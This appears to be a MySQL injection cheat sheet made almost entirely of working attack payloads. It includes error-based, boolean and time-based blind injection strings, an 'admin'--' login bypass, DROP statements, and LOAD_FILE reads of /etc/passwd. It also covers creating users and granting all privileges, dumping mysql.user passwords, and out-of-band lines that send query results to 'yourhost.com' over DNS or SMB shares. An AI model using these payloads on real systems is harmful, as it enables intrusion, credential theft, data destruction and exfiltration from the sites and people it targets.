Mysql İnjection tutorial and cheats :)

1. Initial Exploitation
2. Back to top
3.  
4. Version SELECT @@VERSION
5. SELECT version()
6. Current User SELECT user()
7. SELECT system_user()
8. Current Database SELECT database()
9.  
10. Quick Detection
11. Back to top
12.  
13. Error Based SQLi For integer inputs:
14.  
15. (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand( )*2))x from (select 1 union select 2)a group by x limit 1))
16.  
17. For string inputs:
18. '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand( )*2))x from (select 1 union select 2)a group by x limit 1))+'
19.  
20. The attacks above should throw 'duplicate entry' errors.
21. Clear SQLi Tests These tests are simply good for boolean sql injection and silent attacks.
22.  
23. product.php?id=4
24. product.php?id=5-1
25. product.php?id=4 OR 1=1
26. product.php?id=-1 OR 17-7=10
27.  
28. Blind SQL Injection (Time Based)
29. Back to top
30.  
31. ### Use this when you can not see any difference at output. Second do not use more than 30 seconds, because database API connection timeout could be easily reached.
32. ### This is just like sleep, wait for spesified time. CPU safe way to make database wait.
33.  
34. SLEEP(25)--
35. SELECT BENCHMARK(1000000,MD5('A'));
36. Real World Samples ProductID=1 OR SLEEP(25)=0 LIMIT 1--
37. ProductID=1) OR SLEEP(25)=0 LIMIT 1--
38. ProductID=1' OR SLEEP(25)=0 LIMIT 1--
39. ProductID=1') OR SLEEP(25)=0 LIMIT 1--
40. ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
41. ProductID=SELECT SLEEP(25)--
42.  
43. Line Comments
44. Back to top
45.  
46. DROP sampletable;--
47. DROP sampletable;#
48.  
49. Username : admin'--
50. : admin' or '1'='1'--
51.  
52. SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password'
53.  
54. This is going to log you as admin user, because rest of the SQL query will be ignored.
55.  
56. Inline Comments
57. Back to top
58.  
59. Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
60. DROP/*comment*/sampletable
61. DR/**/OP/*bypass blacklisting*/sampletable
62.  
63. If Statements
64. Back to top
65.  
66. GET RESPONSE based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.
67.  
68. MySQL If Statement
69.  
70. IF condition true-part ELSE false-part
71. SELECT IF (1=1, ‘true’, ‘false’)
72.  
73. If Statement SQL Injection Attack Samples
74.  
75. SELECT IF(user()='root@localhost','true','false')
76.  
77. String without Quotes
78. Back to top
79.  
80. SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
81.  
82. This will return ‘KLM’.
83.  
84. Bulk Insert
85. Back to top
86.  
87. Insert a file content to a table.
88.  
89. SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; --
90.  
91. Load File
92. Back to top
93.  
94. ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
95.  
96. SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
97. This will show the content of c:\boot.ini
98.  
99. Command Execution
100. Back to top
101.  
102. Possible with using UDF (user defined functions).
103.  
104. http://packetstormsecurity.org/libra...s_0.0.3.tar.gz
105.  
106. Create Users
107. Back to top
108.  
109. CREATE USER username IDENTIFIED BY 'password'; --
110.  
111. Drop Users
112. Back to top
113.  
114. DROP USER username; --
115.  
116. Make User DBA
117. Back to top
118.  
119. GRANT ALL PRIVILEGES ON *.* TO username@'%';
120.  
121. List Users
122. Back to top
123.  
124. SELECT * FROM 'user' WHERE 1 LIMIT 0,30
125. SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
126. SELECT * FROM mysql.user
127.  
128. List Passwords
129. Back to top
130.  
131. SELECT user, password FROM mysql.user
132. SELECT user, password FROM mysql.user LIMIT 1,1
133. SELECT password FROM mysql.user WHERE user = 'root'
134.  
135. List Databases
136. Back to top
137.  
138. SELECT schema_name FROM information_schema.schemata;
139. SELECT schema_name FROM information_schema.schemata LIMIT 1,1;
140.  
141. Privileges
142. Back to top
143.  
144. SELECT Super_priv FROM mysql.user WHERE user=(SELECT user) LIMIT 1,1--
145. SELECT Super_priv FROM mysql.user WHERE user= ‘root’ LIMIT 1,1--
146.  
147. Getting user defined tables
148. Back to top
149.  
150. SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'
151.  
152. tblUsers -> tablename
153.  
154. Getting Column Names
155. Back to top
156.  
157. SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers’
158.  
159. tblUsers -> tablename
160.  
161. SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
162.  
163. find table which have a column called 'username'
164.  
165. Default Databases
166. Back to top
167.  
168. information_schema (>= mysql 5.0)
169. mysql
170.  
171. Path of DB files
172. Back to top
173.  
174. SELECT @@datadir
175. C:\AppServ\MySQL\data\
176.  
177. Time Based SQLi Exploitation
178. Back to top
179.  
180. ?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTON}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--
181.  
182. {INJECTION} = You want to run the query.
183.  
184. If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.
185.  
186. Out of Band Channel
187. Back to top
188.  
189. ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\'))) Makes a NBNS query request/DNS resolution request to yourhost.com
190.  
191. ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\ SHARE\\output.txt') Writes data to your shared folder/file
192.  
193. {INJECTION} = You want to run the query.